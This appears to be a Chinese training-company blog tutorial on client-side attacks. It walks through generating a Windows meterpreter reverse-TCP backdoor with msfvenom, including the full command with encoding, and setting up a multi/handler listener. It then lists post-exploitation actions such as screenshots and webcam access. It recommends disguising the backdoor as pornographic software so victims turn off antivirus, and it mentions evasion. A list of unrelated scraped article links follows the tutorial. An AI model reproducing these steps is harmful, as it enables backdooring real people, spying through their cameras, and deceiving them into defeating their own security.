一、使用场景介绍

在我们在无法突破对方的网络边界的时候,往往需要使用客户端渗透这种方式对目标发起攻击,比如我们向目标发一个含有后门的程序,或者是一个word文档、pdf文件。想要达到效果同时也要利用好社会工程学,来诱骗受害者执行恶意程序。
客户端渗透技巧,通常用户的计算机都安装了安全软件,一般我们生成的恶意程序都会被检测,所以我们所设计的恶意软件可以利用人的劣根性,比如我们将恶意软件或网站伪装成色情软件或网站,这样目标会认为他本身就是不好的软件被安全软件检测是很正常的事情,如果他安耐不住关闭安全防护软件执意要运行恶意程序,那么他就中招了。当然这种取巧的办法并不能解决所有问题,我们需要利用免杀来躲避安全软件的查杀。

二、利用方式

1、利用Metasploit渗透测试框架中Msfvenom组件创建后门程序,将后门程序伪装成其他的正常小程序,比如起个具有高吸引力和高诱惑力的名字。
2、将该后门程序发布在相关的网站平台或者直接通过某种合理的方式发送至受害者的电脑中。
3、在kali本地端开启监听功能。
4、诱导用户点击并出发该后门程序,kali端即显示受害者上线,可获取受害者电脑权限,可执行恶意操作。

三、利用Msfvenom创建后门程序

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.85.176 LPORT=4444 -b “\x00” -e x86/shikata_ga_nai -i 10 -f exe -o /var/www/html/test1.exe

  • 参数说明
    -a: 指定架构如x86 x64。x86代表32位,x64代表64位。32位软件可以在64位系统上运行。所以我们生成32位的后门,这样在32位和64位系统中都可以使用。
    –platform: 指定平台,这里选择windows,通过–l platforms可以查看所有支持的平台。
    -p: 设置攻击载荷,我们使用windows/meterpreter/reverse_tcp,可以通过-l payloads查看所有攻击载荷。
    **LHOST:**目标主机执行程序后连接我们Kali的地址LPORT目标主机执行程序后连接我们Kali的端口
    -b: 去掉坏字符,坏字符会影响payload 正常执行。

    后门程序生成

四、开启监听模块

msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > show options

  • 1、初始化数据库
  • 2、通过msfconsole进入Metasploit
  • 3、使用exploit模块并设置攻击载荷
  • 4、set lhost 192.168.85.176
  • 5、exploit

五、受害者下载并触发

  • 1、这里实验环境中通过kali的apache服务提供下载窗口。
  • 2、双击运行test1.exe后门程序

六、exploit成功,已获取对方权限

  • 1、已监听到对方上线,已获取对方权限。
    * 2、获取帮助信息

    这里通过metasploit工具中自带的指令集来执行操作,包括核心指令、文件操作指令等。。。
  • 3、获取屏幕截图
  • 4、调用对方摄像头

----------------------------------------武汉艾迪飞教育-----------------------------------------------------

Msfvenom建立后门程序指令及开启监听相关推荐

  1. linux oracle开启监听服务器,linux服务器启动oracle监听端口

    oracle监听 原理 客户端向服务器端发送连接请求,监听器监听到客户端德连接请求 监听器监听到客户端德连接请求后,把客户端德连接请求交给数据库服务器处理 客户端和服务器端建立连接,连接建立后,服务器 ...

  2. oracle设置本地服务监听端口号,如何开启监听端口号

    数据库监听程序为启动 HOST应该是IP或者主机名 PORT应该是端口号,看你报错信息,你应该弄的有问题啊; 本地实例名= (DESCRIPTION = (ADDRESS = (PROTOCOL = ...

  3. activemq 开启监听_SpringBoot集成ActiveMQ怎么实现Topic发布/订阅模式通信?

    上一期我们讲了SpringBoot集成activeMQ实现Queue模式点对点通信,这一期我们接着讲SpringBoot集成activeMQ实现Topic发布/订阅模式通信. 发布/订阅模式通信是对点 ...

  4. linux开启监听模式抓空口包,运维实战家之设备报文捕获技巧

    SPAN是本地端口镜像用于在单台设备进行一对一端口镜像或多对一端口镜像,将一个或多个端口的流量复制到另外一个端口上,并且还可以在此基础上添加ACL匹配数据流达到更精细化的基于流的端口镜像,此外还可以通 ...

  5. Linux/docker下oracle开启监听,开启自动启动

    写在前头: 之前呢,使用docker安装了oracle,但它默认是会关闭的.使用了几天以后突然连接异常了,报的问题是oracle监听有问题了,我知道了是oracle服务自动关闭了,监听也跟着关了.所以 ...

  6. activemq 开启监听_ActiveMQ 消息监听 MessageListener 的使用

    刚学 ActiveMQ, 最开始搭建环境的时候引入的jar 包,几个核心的jar jms.jar, httpcore.jar , httpclient.jar, activemq-all.jar 准备 ...

  7. 新建的ORACLE实例要开启监听,创建ORACLE实例与设置监听器过程

    一.在ORACLE创建一个新的实例过程: 1.安装好ORACLE服务端. 2.创建数据库实例,使用ORAHOME目录下的"Configuration and Migration Tools& ...

  8. muduo网络库学习(五)服务器监听类Acceptor及Tcp连接TcpConnection的建立与关闭

    通常服务器在处理客户端连接请求时,为了不阻塞在accept函数上,会将监听套接字注册到io复用函数中,当客户端请求连接时,监听套接字变为可读,随后在回调函数调用accept接收客户端连接.muduo将 ...

  9. 渗透测试Metasploit框架体验(3. MsfVenom生成后门木马)

    MsfVenom 首先msf就是Metaaploit,venom就是病毒.msfvenom是msfpayload和msfencode的组合.将这两个工具集成在一个框架实例中.进一步来说,msfveno ...

  10. Socket编程(C语言实现)——TCP协议(网络间通信AF_INET)的流式(SOCK_STREAM)+报式(SOCK_DGRAM)传输【多线程+循环监听】

    Socket编程 目前较为流行的网络编程模型是客户机/服务器通信模式 客户进程向服务器进程发出要求某种服务的请求,服务器进程响应该请求.如图所示,通常,一个服务器进程会同时为多个客户端进程服务,图中服 ...

最新文章

  1. BZOJ 2707: [SDOI2012]走迷宫 [高斯消元 scc缩点]
  2. Python最重要的5大功能,​要是能早点了解就好了
  3. 三星全球首家量产18nm DRAM
  4. 5771. 【NOIP2008模拟】遨游
  5. [Python图像处理] 三十七.OpenCV直方图统计两万字详解(掩膜直方图、灰度直方图对比、黑夜白天预测)
  6. Vue3之——和Vite不得不说的事
  7. uva 10120——Gift?!
  8. 【项目管理】CMM能力成熟度模型
  9. 如何使用 Convert.exe 将分区转换为 NTFS 文件系统
  10. (转载)C# Process.Kill() 拒绝访问(Access Denied) 的解决方案
  11. 深入理解 OUI(Oracle Universal Installer)
  12. 转到Visual Studio中的匹配括号吗?
  13. N002-认知C#中的字符串
  14. wordpress音乐播放器插件–PoiPlayer
  15. Linux数据链路层的包解析
  16. Golang语言编程规范
  17. 计算机考研2022大纲,2022计算机408考研大纲
  18. 第八章 项目质量管理
  19. 安恒明御TM数据库审计与风险控制系统指标
  20. 网络管理(课程总结3)Week12 澳大利亚维多利亚大学VIT1104 Computer Networks

热门文章

  1. Python计算机视觉-仿射扭曲简单实例
  2. iphone图片编辑画笔_iPhone手机怎么编辑图片?还不知道的话真的要了解一波了~...
  3. 4.3 Matplotlib 图中图
  4. 中国顶级CEO经典语录
  5. gmx-MMPBSA — error while loading shared libraries: libgfortran.so.3: cannot open shared object file
  6. 445端口是什么,怎么关闭?
  7. python蒙特卡洛方法圆周率_使用Python语言的蒙特卡洛方法计算圆周率π的一种实现...
  8. 唯美的古风句子_经典优美的古风句子
  9. 深入理解present以及dismiss
  10. Ceres-Solver使用指南